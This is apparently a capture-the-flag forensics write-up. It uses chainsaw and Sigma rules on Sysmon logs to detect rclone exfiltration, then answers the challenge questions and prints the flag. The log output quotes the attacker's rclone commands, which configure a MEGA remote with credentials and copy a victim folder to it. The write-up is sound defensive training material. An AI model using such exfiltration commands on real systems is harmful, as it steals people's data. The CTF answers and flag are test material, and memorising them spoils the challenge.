Packet Cyclone
11 minutes to read
We have this description for the challenge:
Pandoraβs friend and partner, Wade, is the one that leads the investigation into the relicβs location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wadeβs research to the cloud. Using the tool called βchainsawβ and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
And we are given these files:
$ tree
.
βββ Logs
β βββ Application.evtx
β βββ HardwareEvents.evtx
β βββ Internet Explorer.evtx
β βββ Key Management Service.evtx
β βββ Microsoft-Client-Licensing-Platform%4Admin.evtx
β βββ Microsoft-Windows-AAD%4Operational.evtx
β βββ Microsoft-Windows-AppModel-Runtime%4Admin.evtx
β βββ Microsoft-Windows-AppReadiness%4Admin.evtx
β βββ Microsoft-Windows-AppReadiness%4Operational.evtx
β βββ Microsoft-Windows-AppXDeployment%4Operational.evtx
β βββ Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
β βββ Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx
β βββ Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
β βββ Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
β βββ Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
β βββ Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
β βββ Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
β βββ Microsoft-Windows-AppxPackaging%4Operational.evtx
β βββ Microsoft-Windows-Audio%4CaptureMonitor.evtx
β βββ Microsoft-Windows-Audio%4Operational.evtx
β βββ Microsoft-Windows-Audio%4PlaybackManager.evtx
β βββ Microsoft-Windows-Authentication User Interface%4Operational.evtx
β βββ Microsoft-Windows-Biometrics%4Operational.evtx
β βββ Microsoft-Windows-BitLocker%4BitLocker Management.evtx
β βββ Microsoft-Windows-Bits-Client%4Operational.evtx
β βββ Microsoft-Windows-CloudStore%4Operational.evtx
β βββ Microsoft-Windows-CodeIntegrity%4Operational.evtx
β βββ Microsoft-Windows-Containers-BindFlt%4Operational.evtx
β βββ Microsoft-Windows-Containers-Wcifs%4Operational.evtx
β βββ Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx
β βββ Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx
β βββ Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
β βββ Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
β βββ Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
β βββ Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
β βββ Microsoft-Windows-DeviceSetupManager%4Admin.evtx
β βββ Microsoft-Windows-DeviceSetupManager%4Operational.evtx
β βββ Microsoft-Windows-Dhcp-Client%4Admin.evtx
β βββ Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
β βββ Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
β βββ Microsoft-Windows-Diagnosis-PLA%4Operational.evtx
β βββ Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
β βββ Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
β βββ Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
β βββ Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
β βββ Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
β βββ Microsoft-Windows-FileHistory-Core%4WHC.evtx
β βββ Microsoft-Windows-GroupPolicy%4Operational.evtx
β βββ Microsoft-Windows-HelloForBusiness%4Operational.evtx
β βββ Microsoft-Windows-HotspotAuth%4Operational.evtx
β βββ Microsoft-Windows-IKE%4Operational.evtx
β βββ Microsoft-Windows-Kernel-Boot%4Operational.evtx
β βββ Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
β βββ Microsoft-Windows-Kernel-PnP%4Configuration.evtx
β βββ Microsoft-Windows-Kernel-PnP%4Driver Watchdog.evtx
β βββ Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx
β βββ Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
β βββ Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx
β βββ Microsoft-Windows-Kernel-WHEA%4Errors.evtx
β βββ Microsoft-Windows-Kernel-WHEA%4Operational.evtx
β βββ Microsoft-Windows-Known Folders API Service.evtx
β βββ Microsoft-Windows-LanguagePackSetup%4Operational.evtx
β βββ Microsoft-Windows-LiveId%4Operational.evtx
β βββ Microsoft-Windows-MUI%4Admin.evtx
β βββ Microsoft-Windows-MUI%4Operational.evtx
β βββ Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx
β βββ Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
β βββ Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
β βββ Microsoft-Windows-NCSI%4Operational.evtx
β βββ Microsoft-Windows-NetworkProfile%4Operational.evtx
β βββ Microsoft-Windows-Ntfs%4Operational.evtx
β βββ Microsoft-Windows-Ntfs%4WHC.evtx
β βββ Microsoft-Windows-Partition%4Diagnostic.evtx
β βββ Microsoft-Windows-PowerShell%4Admin.evtx
β βββ Microsoft-Windows-PowerShell%4Operational.evtx
β βββ Microsoft-Windows-Privacy-Auditing%4Operational.evtx
β βββ Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
β βββ Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
β βββ Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx
β βββ Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx
β βββ Microsoft-Windows-PushNotification-Platform%4Admin.evtx
β βββ Microsoft-Windows-PushNotification-Platform%4Operational.evtx
β βββ Microsoft-Windows-ReadyBoost%4Operational.evtx
β βββ Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
β βββ Microsoft-Windows-RestartManager%4Operational.evtx
β βββ Microsoft-Windows-SMBClient%4Operational.evtx
β βββ Microsoft-Windows-SMBServer%4Audit.evtx
β βββ Microsoft-Windows-SMBServer%4Connectivity.evtx
β βββ Microsoft-Windows-SMBServer%4Operational.evtx
β βββ Microsoft-Windows-SMBServer%4Security.evtx
β βββ Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
β βββ Microsoft-Windows-Security-Mitigations%4UserMode.evtx
β βββ Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
β βββ Microsoft-Windows-SettingSync%4Debug.evtx
β βββ Microsoft-Windows-SettingSync%4Operational.evtx
β βββ Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx
β βββ Microsoft-Windows-Shell-Core%4ActionCenter.evtx
β βββ Microsoft-Windows-Shell-Core%4AppDefaults.evtx
β βββ Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx
β βββ Microsoft-Windows-Shell-Core%4Operational.evtx
β βββ Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
β βββ Microsoft-Windows-SmbClient%4Audit.evtx
β βββ Microsoft-Windows-SmbClient%4Connectivity.evtx
β βββ Microsoft-Windows-SmbClient%4Security.evtx
β βββ Microsoft-Windows-StateRepository%4Operational.evtx
β βββ Microsoft-Windows-StateRepository%4Restricted.evtx
β βββ Microsoft-Windows-Storage-Storport%4Health.evtx
β βββ Microsoft-Windows-Storage-Storport%4Operational.evtx
β βββ Microsoft-Windows-StorageSpaces-Driver%4Diagnostic.evtx
β βββ Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
β βββ Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx
β βββ Microsoft-Windows-Store%4Operational.evtx
β βββ Microsoft-Windows-Storsvc%4Diagnostic.evtx
β βββ Microsoft-Windows-Sysmon%4Operational.evtx
β βββ Microsoft-Windows-TWinUI%4Operational.evtx
β βββ Microsoft-Windows-TZSync%4Operational.evtx
β βββ Microsoft-Windows-TaskScheduler%4Maintenance.evtx
β βββ Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx
β βββ Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
β βββ Microsoft-Windows-Time-Service%4Operational.evtx
β βββ Microsoft-Windows-UAC%4Operational.evtx
β βββ Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
β βββ Microsoft-Windows-User Device Registration%4Admin.evtx
β βββ Microsoft-Windows-User Profile Service%4Operational.evtx
β βββ Microsoft-Windows-UserPnp%4ActionCenter.evtx
β βββ Microsoft-Windows-UserPnp%4DeviceInstall.evtx
β βββ Microsoft-Windows-VPN%4Operational.evtx
β βββ Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
β βββ Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
β βββ Microsoft-Windows-WFP%4Operational.evtx
β βββ Microsoft-Windows-WMI-Activity%4Operational.evtx
β βββ Microsoft-Windows-Wcmsvc%4Operational.evtx
β βββ Microsoft-Windows-WebAuthN%4Operational.evtx
β βββ Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
β βββ Microsoft-Windows-WinRM%4Operational.evtx
β βββ Microsoft-Windows-Windows Defender%4Operational.evtx
β βββ Microsoft-Windows-Windows Defender%4WHC.evtx
β βββ Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx
β βββ Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
β βββ Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx
β βββ Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
β βββ Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
β βββ Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
β βββ Microsoft-Windows-Winlogon%4Operational.evtx
β βββ Microsoft-Windows-WorkFolders%4WHC.evtx
β βββ Security.evtx
β βββ Setup.evtx
β βββ System.evtx
β βββ Windows PowerShell.evtx
βββ sigma_rules
βββ rclone_config_creation.yaml
βββ rclone_execution.yaml
3 directories, 151 files
Understanding the challenge
The challenge is related to Rclone, which is a tool to manage files on cloud storage. We are given a lot of EVTX files that stand for Windows event logs. Moreover, we have some Sigma rules, which is a generic and open signature format that allows you to describe relevant log events in a straightforward manner.
The challenge description mentions chainsaw
. This tool takes Windows EVTX files and Sigma rules to discover indicators of compromise (IoC).
Indicators of compromise
Letβs run chainsaw
:
$ wget -q https://github.com/WithSecureLabs/chainsaw/releases/download/v2.6.0/chainsaw_x86_64-unknown-linux-gnu.tar.gz
$ tar xvfz chainsaw_x86_64-unknown-linux-gnu.tar.gz
x chainsaw/LICENCE
x chainsaw/README.md
x chainsaw/chainsaw
x chainsaw/mappings/
x chainsaw/mappings/sigma-event-logs-all.yml
x chainsaw/mappings/sigma-mft-logs-all.yml
x chainsaw/mappings/sigma-event-logs-legacy.yml
$ ./chainsaw/chainsaw
Rapidly work with Forensic Artefacts
Usage: chainsaw [OPTIONS] <COMMAND>
Commands:
dump Dump an artefact into a different format
hunt Hunt through artefacts using detection rules for threat detection
lint Lint provided rules to ensure that they load correctly
search Search through forensic artefacts for keywords
analyse Perform various analyses on artifacts
help Print this message or the help of the given subcommand(s)
Options:
--no-banner Hide Chainsaw's banner
--num-threads <NUM_THREADS> Limit the thread number (default: num of CPUs)
-h, --help Print help
-V, --version Print version
Examples:
Hunt with Sigma and Chainsaw Rules:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/
Hunt with Sigma rules and output in JSON:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml --json
Search for the case-insensitive word 'mimikatz':
./chainsaw search mimikatz -i evtx_attack_samples/
Search for Powershell Script Block Events (EventID 4014):
./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
$ ./chainsaw/chainsaw hunt --sigma sigma_rules/ --mapping chainsaw/mappings/sigma-event-logs-all.yml Logs/
ββββββββββ βββ ββββββ βββββββ βββββββββββ ββββββ βββ βββ
βββββββββββ βββββββββββββββββββ ββββββββββββββββββββββ βββ
βββ βββββββββββββββββββββββββ ββββββββββββββββββββββ ββ βββ
βββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββ ββββββ βββββββββ βββββββββββββββββ βββββββββββββ
ββββββββββ ββββββ βββββββββ ββββββββββββββββ βββ ββββββββ
By Countercept (@FranticTyping, @AlexKornitzer)
[+] Loading detection rules from: sigma_rules/
[+] Loaded 2 detection rules
[+] Loading forensic artefacts from: Logs/ (extensions: .evtx, .evt)
[+] Loaded 149 forensic artefacts (54.3 MB)
[+] Hunting: [========================================] 149/149
[+] Group: Sigma
βββββββββββββββββββββββ¬βββββββββββββββββββββββββββββ¬ββββββββ¬βββββββββββββββββββββββββββ¬βββββββββββ¬ββββββββββββ¬ββββββββββββββββββ¬βββββββββββββββββββββββββββββββββ
β timestamp β detections β count β Event.System.Provider β Event ID β Record ID β Computer β Event Data β
βββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌββββββββΌβββββββββββββββββββββββββββΌβββββββββββΌββββββββββββΌββββββββββββββββββΌβββββββββββββββββββββββββββββββββ€
β 2023-02-24 15:35:07 β β£ Rclone Execution via β 1 β Microsoft-Windows-Sysmon β 1 β 76 β DESKTOP-UTDHED2 β CommandLine: '"C:\Users\wade\A β
β β Command Line or PowerShell β β β β β β ppData\Local\Temp\rclone-v1.61 β
β β β β β β β β .1-windows-amd64\rclone.exe" c β
β β β β β β β β onfig create remote mega user β
β β β β β β β β majmeret@protonmail.com pass F β
β β β β β β β β BMeavdiaFZbWzpMqIVhJCGXZ5XXZI1 β
β β β β β β β β qsU3EjhoKQw0rEoQqHyI' β
β β β β β β β β Company: https://rclone.org β
β β β β β β β β CurrentDirectory: C:\Users\wad β
β β β β β β β β e\AppData\Local\Temp\rclone-v1 β
β β β β β β β β .61.1-windows-amd64\ β
β β β β β β β β Description: Rsync for cloud s β
β β β β β β β β torage β
β β β β β β β β FileVersion: 1.61.1 β
β β β β β β β β Hashes: SHA256=E94901809FF7CC5 β
β β β β β β β β 168C1E857D4AC9CBB339CA1F6E21DC β
β β β β β β β β CE95DFB8E28DF799961 β
β β β β β β β β Image: C:\Users\wade\AppData\L β
β β β β β β β β ocal\Temp\rclone-v1.61.1-windo β
β β β β β β β β ws-amd64\rclone.exe β
β β β β β β β β IntegrityLevel: Medium β
β β β β β β β β LogonGuid: 10DA3E43-D892-63F8- β
β β β β β β β β 4B6D-030000000000 β
β β β β β β β β LogonId: '0x36d4b' β
β β β β β β β β OriginalFileName: rclone.exe β
β β β β β β β β ParentCommandLine: '"C:\Window β
β β β β β β β β s\System32\WindowsPowerShell\v β
β β β β β β β β 1.0\powershell.exe" ' β
β β β β β β β β ParentImage: C:\Windows\System β
β β β β β β β β 32\WindowsPowerShell\v1.0\powe β
β β β β β β β β rshell.exe β
β β β β β β β β ParentProcessGuid: 10DA3E43-D8 β
β β β β β β β β D2-63F8-9B00-000000000900 β
β β β β β β β β ParentProcessId: 5888 β
β β β β β β β β ParentUser: DESKTOP-UTDHED2\wa β
β β β β β β β β de β
β β β β β β β β ProcessGuid: 10DA3E43-D92B-63F β
β β β β β β β β 8-B100-000000000900 β
β β β β β β β β ProcessId: 3820 β
β β β β β β β β Product: Rclone β
β β β β β β β β RuleName: '-' β
β β β β β β β β TerminalSessionId: 1 β
β β β β β β β β User: DESKTOP-UTDHED2\wade β
β β β β β β β β UtcTime: 2023-02-24 15:35:07.3 β
β β β β β β β β 36 β
βββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌββββββββΌβββββββββββββββββββββββββββΌβββββββββββΌββββββββββββΌββββββββββββββββββΌβββββββββββββββββββββββββββββββββ€
β 2023-02-24 15:35:17 β β£ Rclone Execution via β 1 β Microsoft-Windows-Sysmon β 1 β 78 β DESKTOP-UTDHED2 β CommandLine: '"C:\Users\wade\A β
β β Command Line or PowerShell β β β β β β ppData\Local\Temp\rclone-v1.61 β
β β β β β β β β .1-windows-amd64\rclone.exe" c β
β β β β β β β β opy C:\Users\Wade\Desktop\Reli β
β β β β β β β β c_location\ remote:exfiltratio β
β β β β β β β β n -v' β
β β β β β β β β Company: https://rclone.org β
β β β β β β β β CurrentDirectory: C:\Users\wad β
β β β β β β β β e\AppData\Local\Temp\rclone-v1 β
β β β β β β β β .61.1-windows-amd64\ β
β β β β β β β β Description: Rsync for cloud s β
β β β β β β β β torage β
β β β β β β β β FileVersion: 1.61.1 β
β β β β β β β β Hashes: SHA256=E94901809FF7CC5 β
β β β β β β β β 168C1E857D4AC9CBB339CA1F6E21DC β
β β β β β β β β CE95DFB8E28DF799961 β
β β β β β β β β Image: C:\Users\wade\AppData\L β
β β β β β β β β ocal\Temp\rclone-v1.61.1-windo β
β β β β β β β β ws-amd64\rclone.exe β
β β β β β β β β IntegrityLevel: Medium β
β β β β β β β β LogonGuid: 10DA3E43-D892-63F8- β
β β β β β β β β 4B6D-030000000000 β
β β β β β β β β LogonId: '0x36d4b' β
β β β β β β β β OriginalFileName: rclone.exe β
β β β β β β β β ParentCommandLine: '"C:\Window β
β β β β β β β β s\System32\WindowsPowerShell\v β
β β β β β β β β 1.0\powershell.exe" ' β
β β β β β β β β ParentImage: C:\Windows\System β
β β β β β β β β 32\WindowsPowerShell\v1.0\powe β
β β β β β β β β rshell.exe β
β β β β β β β β ParentProcessGuid: 10DA3E43-D8 β
β β β β β β β β D2-63F8-9B00-000000000900 β
β β β β β β β β ParentProcessId: 5888 β
β β β β β β β β ParentUser: DESKTOP-UTDHED2\wa β
β β β β β β β β de β
β β β β β β β β ProcessGuid: 10DA3E43-D935-63F β
β β β β β β β β 8-B200-000000000900 β
β β β β β β β β ProcessId: 5116 β
β β β β β β β β Product: Rclone β
β β β β β β β β RuleName: '-' β
β β β β β β β β TerminalSessionId: 1 β
β β β β β β β β User: DESKTOP-UTDHED2\wade β
β β β β β β β β UtcTime: 2023-02-24 15:35:17.5 β
β β β β β β β β 16 β
βββββββββββββββββββββββ΄βββββββββββββββββββββββββββββ΄ββββββββ΄βββββββββββββββββββββββββββ΄βββββββββββ΄ββββββββββββ΄ββββββββββββββββββ΄βββββββββββββββββββββββββββββββββ
[+] 2 Detections found on 2 documents
Solution
Now we can connect to the remote instance and answer the questions (all the needed information appears in the table above):
$ nc 157.245.38.221 32724
+----------------+-------------------------------------------------------------------------------+
| Title | Description |
+----------------+-------------------------------------------------------------------------------+
| Packet Cyclone | Pandora's friend and partner, Wade, is the one that leads |
| | the investigation into the relic's location. |
| | Recently, he noticed some weird traffic coming from his host. |
| | That led him to believe that his host was compromised. |
| | After a quick investigation, his fear was confirmed. Pandora tries now to see |
| | if the attacker caused the suspicious traffic during the exfiltration phase. |
| | Pandora believes that the malicious actor used rclone |
| | to exfiltrate Wade's research to the cloud. |
| | Using the tool chainsaw and many sigma rules that can be found online, |
| | can you detect the usage of rclone from the event logs produced by Sysmon? |
| | To get the flag, you need to start and connect |
| | to the docker service and answer all the questions correctly. |
+----------------+-------------------------------------------------------------------------------+
What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
> majmeret@protonmail.com
[+] Correct!
What is the password of the attacker used for the exfiltration process? (for example: password123)
> FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
[+] Correct!
What is the Cloud storage provider used by the attacker? (for example: cloud)
> mega
[+] Correct!
What is the ID of the process used by the attackers to configure their tool? (for example: 1337)
> 3820
[+] Correct!
What is the name of the folder the attacker exfiltrated; provide the full path. (for example: C:\Users\user\folder)
> C:\Users\Wade\Desktop\Relic_location
[+] Correct!
What is the name of the folder the attacker exfiltrated the files to? (for example: exfil_folder)
> exfiltration
[+] Correct!
Flag
And hereβs the flag:
[+] Here is the flag: HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}